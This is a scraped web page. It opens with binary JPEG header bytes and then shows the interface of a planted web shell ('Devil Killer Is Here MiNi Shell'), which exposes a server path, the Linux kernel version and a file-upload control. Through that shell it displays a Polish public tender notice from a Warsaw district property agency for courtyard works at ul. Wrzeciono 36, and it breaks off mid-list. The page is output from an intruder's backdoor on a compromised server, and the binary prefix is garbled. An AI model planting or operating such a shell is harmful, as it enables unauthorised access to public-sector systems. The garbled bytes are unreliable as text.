JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220323/0009577901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja podwórka przy ul. Wrzeciono 36 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarowania Nieruchomościami w Dzielnicy Bielany m.st. Warszawy</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ZGN w Dzielnicy Bielany</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 10858838000000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grębałowska 23/25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-808</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zgn-bielany.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zgn-bielany.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja podwórka przy ul. Wrzeciono 36 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9d8ef73a-aa84-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00095779</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00002438/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja podwórek administrowanych przez ZGN</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl,<br/>ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej (za wyjątkiem złożenia oferty).<br/>2. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty<br/>lub wniosku oraz do formularza do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu opisane zostały w Instrukcji użytkownika systemu miniPortal ePUAP<br/>dostępnej pod adresem https://miniportal.uzp.gov.pl oraz Warunkach korzystania z elektronicznej<br/>platformy usług administracji publicznej (ePUAP).<br/>4. Wykonawca przystępując do niniejszego postępowania akceptuje warunki korzystania z miniPortalu,<br/>określone w instrukcji oraz regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu<br/>przestrzegać postanowień tego regulaminu i instrukcji.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia,<br/>zmiany i wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>6. Zamawiający przekazuje link do postępowania oraz identyfikator postępowania.<br/>7. Identyfikator postępowania dla danego postępowania o udzielenie zamówienia dostępny jest<br/>również na Liście wszystkich postępowań na miniPortalu oraz Zamawiający udostępnia na swojej<br/>stronie internetowej.<br/>8. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 PZP, podmiotowych<br/>środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub<br/>dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>9. Wszelkie zawiadomienia, oświadczenia, wnioski oraz informacje, Zamawiający oraz Wykonawcy<br/>przekazują powołując się na numerem referencyjny postępowania, tj. 29/KT/2022/W<br/>- za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal (Formularz do komunikacji),<br/>lub<br/>- drogą elektroniczną na adres: zamówienia@zgn-bielany.waw.pl lub joanna.czarnecka@zgnbielany.waw.pl lub na adres skrytki: ePUAP: /zgnbielany/SkrytkaESP</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W zakresie danych osobowych w związku z przetwarzaniem<br/>danych zgodnie z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r.,<br/>poz. 2019, z późn. zm.) w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>Zakład Gospodarowania Nieruchomościami w Dzielnicy Bielany m. st. Warszawy, ul. Grębałowska<br/>23/25, 01-808 Warszawa (dalej: „ZGN w Dzielnicy Bielany m. st. Warszawy”) przetwarza dane zawarte<br/>w ofertach albo wnioskach o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia<br/>publicznego, znajdujące się w publicznie dostępnych rejestrach (Krajowy Rejestr Sądowy, Centralna<br/>Ewidencja i Informacja o Działalności Gospodarczej RP, Krajowy Rejestr Karny) w celu prowadzenia<br/>postępowań w sprawie zamówienia publicznego na postawie przepisów ustawy z dnia 11 września<br/>2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r., poz. 2019, z późn. zm.). Wśród tych informacji<br/>mogą pojawić się dane, które na gruncie Rozporządzenia Parlamentu Europejskiego i Rady Unii<br/>Europejskiej 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (dalej: „Ogólne Rozporządzenie” lub „RODO”), mają charakter danych<br/>osobowych.<br/>W świetle powyższego ZGN w Dzielnicy Bielany m. st. Warszawy informuje, że:<br/>1. Administratorem danych osobowych (dalej: „Administrator”) jest Zakład Gospodarowania<br/>Nieruchomościami w Dzielnicy Bielany m. st. Warszawy z siedzibą w Warszawie przy ul. Grębałowskiej<br/>23/25,01-808 Warszawa, NIP: 118176 5177, REGON:010858838 email: iod@zgn-bielany.waw.pl.<br/>2. W sprawach związanych z Pani/Pana danymi proszę kontaktować się z Inspektorem Ochrony<br/>Danych, kontakt pisemny za pomocą poczty tradycyjnej na adres: Zakład Gospodarowania<br/>Nieruchomościami w Dzielnicy Bielany m. st. Warszawy z siedzibą w Warszawie przy ul. Grębałowskiej<br/>23/25,01-808 Warszawa; e-mail: iod@zgn-bielany.waw.pl.<br/>3. Dane osobowe zawarte w ofertach są przetwarzane na podstawie art. 6 ust. 1 lit. c RODO, tj.<br/>przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze.<br/>Celem przetwarzania danych osobowych jest prowadzenie w imieniu własnym zamówień publicznych.<br/>Przetwarzanie danych osobowych na potrzeby ww. postępowań mieści się w zakresie działalności<br/>statutowej ZGN w Dzielnicy Bielany m. st. Warszawy. Przetwarzanie tych danych jest niezbędne, aby<br/>ZGN w Dzielnicy Bielany m. st. Warszawy mógł prawidłowo wypełniać nałożone na niego obowiązki.<br/>4. Odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy ZGN w Dzielnicy Bielany m.<br/>st. Warszawy.<br/>5. Pani/Pana dane osobowe będą przechowywane przez okres:<br/>1. 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego,<br/>2. jeżeli czas trwania umowy przekracza 4 lata - przez cały czas trwania umowy.<br/>6. Posiada Pani/Pan prawo dostępu do treści swoich danych oraz prawo ich sprostowania, usunięcia,<br/>ograniczenia przetwarzania, prawo do przenoszenia danych, prawo wniesienia sprzeciwu wobec<br/>przetwarzania.<br/>7. Ma Pan/Pani prawo wniesienia skargi do organu nadzorczego, gdy uzna Pani/Pan, iż przetwarzanie<br/>danych osobowych Pani/Pana dotyczących narusza przepisy ogólnego rozporządzenia o ochronie<br/>danych osobowych z dnia 27 kwietnia 2016 r.<br/>8. Podanie przez Pana/Panią danych osobowych jest wymogiem ustawowym. Jest Pan/Pani<br/>zobowiązana do ich podania, a konsekwencją niepodania danych osobowych będzie niemożliwość<br/>oceny ofert i zawarcia umowy.<br/>9. Dane udostępnione przez Panią/Pana nie będą podlegały profilowaniu.<br/>10. Administrator danych nie ma zamiaru przekazywać danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej. (.......)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">29/KT/2022/W</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 354207,59 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Modernizacja podwórka przy ul. Wrzeciono 36<br/><br/>W części projektowej Wykonawca:<br/>1.	Otrzyma od Zamawiającego upoważnienie do uzyskania niezbędnych zgód i pozwoleń na realizację planowanych robót budowlanych<br/>2.	Przedstawi Zamawiającemu do akceptacji propozycję modernizacji podwórek przy ul. Wrzeciono 36. Wstępne projekty zostaną przedstawiony min. w formie:<br/>a.	opracowanego schematu funkcjonalno – użytkowego,<br/>b.	bilansu odzyskanej powierzchni biologicznie – czynnej.<br/>3.	Brak zgody Zamawiającego na przedstawioną propozycję skutkować będzie opracowaniem przez Wykonawcę nowej propozycji modernizacji podwórka przy ul. Wrzeciono 36 z uwzględnieniem uwag Zamawiającego.<br/>4.	Opracuje informację dotyczącą bezpieczeństwa i ochrony zdrowia, o ile zajdzie taka potrzeba<br/>5.	Po uzyskaniu akceptacji Zamawiającego, wykona niezbędną dokumentację techniczną, o której mowa w rozdziale 4 ustawy prawo budowlanego<br/>6.	Dokona zawiadomienia właściwego organu administracji architektoniczno – budowlanej o planowanych robotach budowlanych.<br/>Część projektową kończy brak sprzeciwu organu administracji architektoniczno – budowlanej, po upływie 21 dni licząc od dnia dokonania skutecznego zgłoszenia modernizacji podwórka przy ul. Wrzeciono 36, bądź uzyskanie od organu administracji architektoniczno – budowlanej zaświadczenia o braku podstaw do wniesienia sprzeciwu lub uzyskanie decyzji o pozwoleniu na budowę.<br/><br/>W części dotyczącej wykonania robót Wykonawca powinien przewidzieć wykonanie następujących robót (przedmiar robót jest przykładowy – rzeczywisty zakres robót określać będzie dokumentacja techniczna):<br/>1.	Zabezpieczenie terenu przed dostępem osób trzecich – budowa: 1 kpl.<br/>2.	Rozebranie chodników z płyt betonowych o wymiarach 35x35x5 cm na podsypce cementowo piaskowej: 132 m2<br/>3.	Rozebranie nawierzchni z mas mineralno-bitumicznych gr. 6cm mechanicznie: 1 072 m2<br/>4.	Mechaniczne rozebranie podbudowy o grubości 12 cm 1 072 m2<br/>5.	Mechaniczne rozebranie podbudowy z gruntu stabilizowanego o grubości 10 cm 1 204 m2<br/>6.	Rozebranie obrzeży trawnikowych o wymiarach 8x30 cm na podsypce piaskowej 345 m<br/>7.	Rozbiórka elementów konstrukcji betonowych niezbrojonych o grubości ponad 15 cm - rozbiórka muru: 12 m3<br/>8.	Utylizacja bądź recykling materiałów z rozbiórki – asfalt 64,32 m3<br/>9.	Utylizacja bądź recykling materiałów z rozbiórki – gruz 275,92 m3<br/>10.	Wywiezienie gruzu spryzmowanego samochodami samowyładowczymi 340,24 m3<br/>11.	Roboty pomiarowe przy powierzchniowych robotach ziemnych – koryta 849 m2<br/>12.	Koryta wykonywane mechanicznie gł. 9 cm w gruncie kat. II-VI na całej szerokości jezdni i chodników - koryto uśrednione z gł. 0 cm (25%) i 12 cm (75%) 849 m2<br/>13.	Wywóz ziemi samochodami samowyładowczymi grunt.kat. III 161,31 m3<br/>14.	Rowki pod krawężniki i obrzeża 494 m<br/>15.	Wywóz ziemi samochodami samowyładowczymi grunt.kat. III 44,46 m3<br/>16.	Ławy fundamentowe betonowe, prostokątne szerokości 30 cm - ręczne układanie betonu 9,72 m3<br/>17.	Krawężniki betonowe wystające o wymiarach 20x30 cm bez ław na podsypce piaskowej. Krawężniki w kolorze zbliżonym do RAL 7046 - jasnoszary wykonanych na bazie kruszyw kamiennych 108 m<br/>18.	Obrzeża betonowe o wymiarach 20x6 cm na podsypce cementowo-piaskowej, spoiny wypełnione zaprawą cementową. Obrzeża w kolorze zbliżonym do RAL 7046 - jasnoszary wykonanych na bazie kruszyw kamiennych	386 m<br/>19.	Profilowanie i zagęszczanie podłoża wykonywane ręcznie w gruncie kat. II-IV pod warstwy konstrukcyjne nawierzchni 849 m2<br/>20.	Podbudowa z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 15 cm 849 m2<br/>21.	Podbudowa betonowa bez dylatacji - grubość warstwy po zagęszczeniu 12 cm 508 m2<br/>22.	Chodniki z kostki brukowej betonowej grubości 8 cm na podsypce piaskowej z wypełnieniem spoin piaskiem. Kostki brukowe 10x20x8 cm w kolorze zbliżonym do RAL 7015 - ciemnoszary wykonanych na bazie kruszyw kamiennych 248 m2<br/>23.	Chodniki z płyt ażurowych betonowych 260 m2<br/>24.	Chodniki z płyt betonowych o wymiarach 50x50x7 cm na podsypce piaskowej, spoiny wypełnione piaskiem. Płyty chodnikowe w kolorze zbliżonym do RAL 7046 - jasnoszary wykonanych na bazie kruszyw kamiennych	341 m2<br/>25.	Rowki pod ławę palisady 37 m<br/>26.	Wywóz ziemi samochodami samowyładowczymi 6,66 m3<br/>27.	Ława pod palisadę betonowa z oporem 3,33 m3<br/>28.	Palisada betonowa 16,5x11x80 cm zakotwiona w ławie 37 m<br/>29.	Ręczne plantowanie powierzchni gruntu rodzimego kat.I-III 280m2<br/>30.	Rozścielenie ziemi urodzajnej ręczne z transportem taczkami na terenie płaskim 25,2 m3<br/>31.	Dostarczenie ziemi kl. I-IV 25,2 m3<br/>32.	Wykonanie trawników dywanowych siewem na gruncie kat. III bez nawożenia 280 m2<br/>33.	Remont cząstkowy nawierzchni z kostki betonowej z wypełnieniem spoin piaskiem 41,25 m2<br/>34.	Przestawienie obrzeży betonowych 30x8 cm na podsypce piaskowej z wypełnieniem spoin piaskiem 27,5 m<br/>35.	Regulacja pionowa studzienek dla włazów kanałowych 1 szt.<br/>36.	Regulacja pionowa studzienek dla kratek ściekowych ulicznych 1 szt.<br/>37.	Wykonanie dokumentacji technicznej niezbędnej do realizacji przedsięwzięcia, w tym uzyskanie wszystkich zgód i pozwoleń 1 kpl.<br/>38.	Zakup i montaż metalowo - drewnianej ławki miejskiej z oparciem i 2 podłokietnikami typu warszawskiego	1 szt.<br/>39.	Zakup i montaż stojaka na rowery zgodnie z Zarządzeniem Prezydenta m.st. Warszawy z dnia 18.11.2010 r.	2 szt.<br/>40.	Zakup i montaż głazu o wymiarach min. 0,5 x 0,5 x 0,5 m3 12 szt.<br/>41.	Słupki ograniczające z liną – rozebranie 1 kpl. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-05</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Zamawiający oceni i porówna jedynie te oferty, które nie podlegają odrzuceniu.<br/>2)	Za ofertę najkorzystniejszą dla obydwu Części zostanie uznana oferta zawierająca najkorzystniejszy ilość punktów w kryterium: <br/>1.	Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>1.	„Cena brutto” – C<br/>2.	„Termin udzielonej gwarancji: 30% (maksimum 84 miesięcy i więcej)”– G<br/>3.	„Doświadczenie kierownika (maksimum 20 lat i więcej)” – D</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin udzielonej gwarancji: 30% (maksimum 84 miesięcy i więcej)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika (maksimum 20 lat i więcej)”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>a.	spełniają warunki udziału w postępowaniu określone przez Zamawiającego dotyczące:<br/>i.	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie.<br/>ii.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie.<br/>iii.	sytuacji ekonomicznej lub finansowej:<br/>1.	Wykonawca zobowiązany jest wykazać, że jest ubezpieczony (posiada polisę lub inny dokument ubezpieczenia) od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 400 000,00-zł <br/>iv.	zdolności technicznej lub zawodowej: <br/>1.	Wykonawca spełni niniejszy warunek, jeżeli wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy — w tym okresie, wykonał co najmniej roboty/robotę budowlane/ą odpowiadających/ą swoim rodzajem robocie stanowiącej przedmiot zamówienia na kwotę nie mniejszą niż: 400 000 zł brutto;<br/>2.	Wykonawca spełni niniejszy warunek jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia o kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia, tj. Kierownika robót posiadającego uprawnienia budowlane w specjalności drogowej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w 